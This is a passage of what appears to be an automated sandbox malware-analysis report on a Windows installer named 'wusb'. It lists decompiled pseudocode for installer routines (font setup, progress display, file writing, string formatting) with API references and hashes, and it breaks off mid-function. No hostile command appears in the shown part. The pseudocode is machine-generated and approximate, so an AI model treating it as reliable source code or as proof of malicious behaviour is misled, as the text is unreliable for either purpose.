				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				 *0x40cdc7 = 1;
				 *0x40cdc4 = _t15 & 0x00000001;
				 *0x40cdc5 = _t15 & 0x00000002;
				 *0x40cdc6 = _t15 & 0x00000004;
				E0040626E(_t9, _t31, _t33, "Calibri",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectW(0x40cdb0);
				_push(_t18);
				_push(_t33);
				E00406193();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                        0x00401db3
                                                        0x00401dbe
                                                        0x00401dc0
                                                        0x00401dcd
                                                        0x00401de4
                                                        0x00401de9
                                                        0x00401df6
                                                        0x00401dfb
                                                        0x00401dff
                                                        0x00401e0a
                                                        0x00401e11
                                                        0x00401e23
                                                        0x00401e29
                                                        0x00401e2e
                                                        0x00401e38
                                                        0x0040258c
                                                        0x0040156d
                                                        0x00402a65
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401DB6
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                        • ReleaseDC.USER32 ref: 00401DE9
                                                        • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID: Calibri
                                                        • API String ID: 3808545654-1409258342
                                                        • Opcode ID: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                                        • Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
                                                        • Opcode Fuzzy Hash: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
                                                        • Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 100015FF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41memorylibraryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}






                                                        0x10001619
                                                        0x10001625
                                                        0x10001632
                                                        0x10001639
                                                        0x10001642
                                                        0x1000164e

                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                        • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                        • GlobalFree.KERNEL32 ref: 10001642
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.677589038.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.677505776.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677602813.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677619149.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_wusb.jbxd
                                                        Similarity
                                                        • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                        • String ID: Nhv@hhv
                                                        • API String ID: 1148316912-2967376847
                                                        • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                        • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                        • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                        • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00402DD7(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40ce98; // 0x54265
					_t11 =  *0x418ea4; // 0x54269
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                        0x00402de7
                                                        0x00402df5
                                                        0x00402dfb
                                                        0x00402dfb
                                                        0x00402e09
                                                        0x00402e0b
                                                        0x00402e11
                                                        0x00402e18
                                                        0x00402e1a
                                                        0x00402e1a
                                                        0x00402e30
                                                        0x00402e40
                                                        0x00402e52
                                                        0x00402e52
                                                        0x00402e5a

                                                        APIs
                                                        Strings
                                                        • verifying installer: %d%%, xrefs: 00402E2A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: verifying installer: %d%%
                                                        • API String ID: 1451636040-82062127
                                                        • Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                        • Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
                                                        • Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
                                                        • Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 37%
                                                        			E004028A7(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
				_t50 = E00402C37(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E00405B94(_t50) == 0) {
					E00402C37(0xffffffed);
				}
				E00405D19(_t50);
				_t26 = E00405D3E(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42a218;
					 *(_t56 - 0x3c) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E004032F5(_t45);
						E004032DF(_t49,  *(_t56 - 0x3c));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x4c) = _t54;
						if(_t54 != _t45) {
							_push( *(_t56 - 0x20));
							_push(_t54);
							_push(_t45);
							_push( *((intOrPtr*)(_t56 - 0x24)));
							E004030FA();
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x34) =  *_t54;
								E00405CF9( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x34);
							}
							GlobalFree( *(_t56 - 0x4c));
						}
						E00405DF0( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
						GlobalFree(_t49);
						_push(_t45);
						_push(_t45);
						_push( *(_t56 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t56 - 0x30)) = E004030FA();
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                        0x004028a7
                                                        0x004028a9
                                                        0x004028b5
                                                        0x004028b8
                                                        0x004028c2
                                                        0x004028c6
                                                        0x004028c6
                                                        0x004028cc
                                                        0x004028d9
                                                        0x004028e1
                                                        0x004028e4
                                                        0x004028ea
                                                        0x004028f8
                                                        0x004028fd
                                                        0x00402901
                                                        0x00402904
                                                        0x0040290d
                                                        0x00402919
                                                        0x0040291d
                                                        0x00402920
                                                        0x00402922
                                                        0x00402925
                                                        0x00402926
                                                        0x00402927
                                                        0x0040292a
                                                        0x00402949
                                                        0x00402931
                                                        0x00402936
                                                        0x0040293e
                                                        0x00402941
                                                        0x00402946
                                                        0x00402946
                                                        0x00402950
                                                        0x00402950
                                                        0x0040295d
                                                        0x00402963
                                                        0x00402969
                                                        0x0040296a
                                                        0x0040296b
                                                        0x0040296e
                                                        0x00402975
                                                        0x00402975
                                                        0x0040297b
                                                        0x0040297b
                                                        0x00402986
                                                        0x00402987
                                                        0x0040298b
                                                        0x0040298f
                                                        0x00402995
                                                        0x00402995
                                                        0x0040299c
                                                        0x00402245
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                        • GlobalFree.KERNEL32 ref: 00402950
                                                        • GlobalFree.KERNEL32 ref: 00402963
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                        • String ID:
                                                        • API String ID: 2667972263-0
                                                        • Opcode ID: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
                                                        • Instruction ID: c6e800f027f1e1b1e461e4fc783814b3910171fe2b09394c7840a14eb176b3fb
                                                        • Opcode Fuzzy Hash: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
                                                        • Instruction Fuzzy Hash: 9821BFB1D00124BBDF206FA5DE49D9E7E79EF08364F10423AF954762E1CB794C419B98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 77%
                                                        			E00404A6C(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040626E(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040626E(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040626E(_t44, _t50, 0x4236e8, 0x4236e8, _a8);
				wsprintfW(_t34 + lstrlenW(0x4236e8) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x4291d8, _a4, 0x4236e8);
			}



















                                                        0x00404a75
                                                        0x00404a7a
                                                        0x00404a82
                                                        0x00404a83
                                                        0x00404a90
                                                        0x00404a98
                                                        0x00404a99
                                                        0x00404a9b
                                                        0x00404a9d
                                                        0x00404a9f
                                                        0x00404aa2
                                                        0x00404aa2
                                                        0x00404aa9
                                                        0x00404aaf
                                                        0x00404aaf
                                                        0x00404ab6
                                                        0x00404abd
                                                        0x00404ac0
                                                        0x00404ac3
                                                        0x00404ac3
                                                        0x00404ac7
                                                        0x00404ad7
                                                        0x00404ad9
                                                        0x00404adc
                                                        0x00404a85
                                                        0x00404a85
                                                        0x00404a8c
                                                        0x00404a8c
                                                        0x00404ae4
                                                        0x00404aef
                                                        0x00404b05
                                                        0x00404b16
                                                        0x00404b32

                                                        APIs
                                                        • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                                        • wsprintfW.USER32 ref: 00404B16
                                                        • SetDlgItemTextW.USER32 ref: 00404B29
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s$6B
                                                        • API String ID: 3540041739-3884863406
                                                        • Opcode ID: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                                        • Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
                                                        • Opcode Fuzzy Hash: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
                                                        • Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 88%
                                                        			E00402592(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t14;
				int _t17;
				int _t24;
				signed int _t29;
				intOrPtr* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				signed int _t40;

				_t32 = __esi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x20);
				_t38 = __edx - 0x38;
				 *(_t35 - 0x4c) = _t14;
				_t27 = 0 | _t38 == 0x00000000;
				_t29 = _t38 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402C37(0x11)) + _t16;
					} else {
						E00402C37(0x21);
						WideCharToMultiByte(__ebx, __ebx, "Finishs", 0xffffffff, "C:\Users\alfons\AppData\Roaming", 0x400, __ebx, __ebx);
						_t17 = lstrlenA("C:\Users\alfons\AppData\Roaming");
					}
				} else {
					E00402C15(1);
					 *0x40ada8 = __ax;
					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t32 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t34 = E004061AC(_t27, _t32);
					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405E1F(_t34, _t34) >= 0) {
						_t14 = E00405DF0(_t34, "C:\Users\alfons\AppData\Roaming",  *(_t35 + 8));
						_t40 = _t14;
						if(_t40 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}












                                                        0x00402592
                                                        0x00402592
                                                        0x00402592
                                                        0x00402597
                                                        0x0040259a
                                                        0x0040259d
                                                        0x004025a2
                                                        0x004025a4
                                                        0x004025c4
                                                        0x00402602
                                                        0x004025c6
                                                        0x004025c8
                                                        0x004025e2
                                                        0x004025ed
                                                        0x004025ed
                                                        0x004025a6
                                                        0x004025a8
                                                        0x004025ad
                                                        0x004025bb
                                                        0x004025be
                                                        0x00402607
                                                        0x0040260a
                                                        0x00402885
                                                        0x00402885
                                                        0x00402610
                                                        0x00402619
                                                        0x0040261b
                                                        0x0040263a
                                                        0x004015b4
                                                        0x004015b6
                                                        0x00000000
                                                        0x004015bc
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040261b
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(?,?,Finishs,000000FF,C:\Users\user\AppData\Roaming,00000400,?,?,00000021), ref: 004025E2
                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming,?,?,Finishs,000000FF,C:\Users\user\AppData\Roaming,00000400,?,?,00000021), ref: 004025ED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWidelstrlen
                                                        • String ID: C:\Users\user\AppData\Roaming$Finishs
                                                        • API String ID: 3109718747-884114584
                                                        • Opcode ID: 4caddf9fd98015af0c89a896aabe676fd06aff106387eddf506ca1aab1ee46e7
                                                        • Instruction ID: 514f5b9530cea4d9367e026ee51610d144416164e286c499b2b09fde189c8ffc
                                                        • Opcode Fuzzy Hash: 4caddf9fd98015af0c89a896aabe676fd06aff106387eddf506ca1aab1ee46e7
                                                        • Instruction Fuzzy Hash: B8113B32A00200FFDB146FB18E8D99F76649F54345F20843BF502F22C1D9BC49415B5E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 97%
                                                        			E100018A9(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v76;
				void* _t43;
				signed int _t44;
				signed int _t59;
				void _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t80;
				signed int _t84;
				signed int _t86;
				signed int _t89;
				void* _t100;

				_t84 = __edx;
				 *0x1000406c = _a8;
				_t59 = 0;
				 *0x10004070 = _a16;
				_v12 = 0;
				_v8 = E10001243();
				_t89 = E10001311(_t41);
				_t86 = _t84;
				_t43 = E10001243();
				_t63 =  *_t43;
				_a8 = _t43;
				if(_t63 != 0x7e && _t63 != 0x21) {
					_a16 = E10001243();
					_t59 = E10001311(_t56);
					_v12 = _t84;
					GlobalFree(_a16);
					_t43 = _a8;
				}
				_t64 =  *_t43 & 0x0000ffff;
				_t100 = _t64 - 0x2f;
				if(_t100 > 0) {
					_t65 = _t64 - 0x3c;
					__eflags = _t65;
					if(_t65 == 0) {
						__eflags =  *((short*)(_t43 + 2)) - 0x3c;
						if( *((short*)(_t43 + 2)) != 0x3c) {
							__eflags = _t86 - _v12;
							if(__eflags > 0) {
								L54:
								_t44 = 0;
								__eflags = 0;
								L55:
								asm("cdq");
								L56:
								_t89 = _t44;
								L57:
								_t86 = _t84;
								L58:
								E10001470(_t84, _t89, _t86,  &_v76);
								E10001272( &_v76);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L47:
								__eflags = 0;
								L48:
								_t44 = 1;
								goto L55;
							}
							__eflags = _t89 - _t59;
							if(_t89 < _t59) {
								goto L47;
							}
							goto L54;
						}
						_t84 = _t86;
						_t44 = E10002D90(_t89, _t59, _t84);
						goto L56;
					}
					_t67 = _t65 - 1;
					__eflags = _t67;
					if(_t67 == 0) {
						__eflags = _t89 - _t59;
						if(_t89 != _t59) {
							goto L54;
						}
						__eflags = _t86 - _v12;
						if(_t86 != _v12) {
							goto L54;
						}
						goto L47;
					}
					_t68 = _t67 - 1;
					__eflags = _t68;
					if(_t68 == 0) {
						__eflags =  *((short*)(_t43 + 2)) - 0x3e;
						if( *((short*)(_t43 + 2)) != 0x3e) {
							__eflags = _t86 - _v12;
							if(__eflags < 0) {
								goto L54;
							}
							if(__eflags > 0) {
								goto L47;
							}
							__eflags = _t89 - _t59;
							if(_t89 <= _t59) {
								goto L54;
							}
							goto L47;
						}
						_t84 = _t86;
						_t44 = E10002DB0(_t89, _t59, _t84);
						goto L56;
					}
					_t70 = _t68 - 0x20;
					__eflags = _t70;
					if(_t70 == 0) {
						_t89 = _t89 ^ _t59;
						_t86 = _t86 ^ _v12;
						goto L58;
					}
					_t71 = _t70 - 0x1e;
					__eflags = _t71;
					if(_t71 == 0) {
						__eflags =  *((short*)(_t43 + 2)) - 0x7c;
						if( *((short*)(_t43 + 2)) != 0x7c) {
